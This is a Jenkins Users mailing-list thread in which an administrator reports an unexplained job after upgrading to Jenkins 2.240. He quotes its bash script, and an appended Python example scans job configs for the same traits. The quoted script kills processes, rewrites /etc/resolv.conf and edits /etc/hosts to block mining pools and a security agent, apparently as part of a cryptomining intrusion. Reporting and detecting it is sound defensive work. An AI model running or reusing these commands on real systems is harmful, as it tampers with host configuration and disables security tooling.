We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.
Thank you all for the concern :)

Cheers,
Randall

On Wednesday, 1 July 2020 09:55:06 UTC-4, Jan Monterrubio wrote:
>
> Randall/Daniel, if there does end up being malware for this release would
> you mind replying on this thread?
>
> On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
>>
>> Thanks for your report.
>>
>> I filed an issue on your behalf in the Jenkins project's private security
>> issue tracker. You should have gotten an email notification from Jira about
>> it. Please provide more information there to help us investigate.
>>
>> > On 22. Jun 2020, at 19:15, Randall Becker <the....@gmail.com> wrote:
>> >
>> > Hi All,
>> >
>> > We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
>> >
>> > #!/bin/bash
>> >
>> > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
>> > hostHash=$(hostname -f | md5sum | cut -c1-8);
>> > echo "${hostHash} - ${threadCount}";
>> > ktr () {
>> > killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>> > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>> > killall viunix;pkill viunix;killall -s SIGKILL viunix
>> > kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>> > echo kill
>> > }
>> >
>> > ktr
>> > ktr
>> > ktr
>> > echo plsfoodforcatsnlove
>> > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
>> > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
>> > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
>> > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
>> > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
>> > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
>> > echo "0.0.0.0 minexmr.com" >> /etc/hosts
>> >
>> > This is really creepy because this script cannot possibly run on our
>> > system (the good part). The bad part is that no one in our organization
>> > created this job. Is it possible that there is some malware floating
>> > around? Our Jenkins instance is hiding behind a firewall so there's no way
>> > in.
>> >
>> > Thanks,
>> > Randall
>> >
>> > --
>> > You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
>> > To unsubscribe from this group and stop receiving emails from it, send an email to jenkins...@googlegroups.com.
>> > To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
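
One way to triage a controller for jobs like the one reported above, as an added example that is not part of the original thread: it reads each job's config.xml under JENKINS_HOME/jobs, extracts the "Execute shell" build steps, and flags the behaviours visible in the quoted script. The rule names, regexes and sample XML are this example's own assumptions; a hit is a reason to review the job, not a verdict.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Behaviours visible in the script quoted above; the regexes are this example's own.
RULES = {
    "rewrites-resolver": re.compile(r">\s*/etc/resolv\.conf"),
    "appends-hosts-file": re.compile(r">>\s*/etc/hosts"),
    "blocks-mining-pool": re.compile(r"0\.0\.0\.0\s+\S*(?:supportxmr|minexmr)\.com"),
    "force-kills-processes": re.compile(r"killall\s+-s\s+SIGKILL|p?kill\s+-9"),
    "fingerprints-host": re.compile(r"hostname\s+-f\s*\|\s*md5sum"),
}

def shell_steps(config_xml):
    """Return the text of every 'Execute shell' build step in a job config.xml."""
    # Jenkins may write an XML 1.1 declaration, which expat-based parsers can reject.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    root = ET.fromstring(body)  # entities such as &gt;&gt; are decoded here
    return [s.findtext("command", "") for s in root.iter("hudson.tasks.Shell")]

def findings(config_xml):
    """Return the sorted names of the rules matched by any shell step."""
    scripts = shell_steps(config_xml)
    return sorted(n for n, rx in RULES.items() if any(rx.search(s) for s in scripts))

def scan_home(jenkins_home):
    """Map each flagged config.xml under <jenkins_home>/jobs to its findings."""
    report = {}
    for cfg in Path(jenkins_home, "jobs").rglob("config.xml"):
        try:
            hits = findings(cfg.read_text(encoding="utf-8", errors="replace"))
        except ET.ParseError:
            hits = ["unparseable-config"]  # worth a manual look as well
        if hits:
            report[str(cfg)] = hits
    return report

# Constructed sample: a freestyle job carrying four lines of the quoted script.
SAMPLE = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>
hostHash=$(hostname -f | md5sum | cut -c1-8);
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
echo 'nameserver 1.1.1.1' &gt; /etc/resolv.conf
echo "0.0.0.0 pool.minexmr.com" &gt;&gt; /etc/hosts
</command></hudson.tasks.Shell></builders></project>"""

if __name__ == "__main__":
    print(findings(SAMPLE))
```

Comparing the flagged jobs against who created or last changed them then shows which ones nobody in the organization owns.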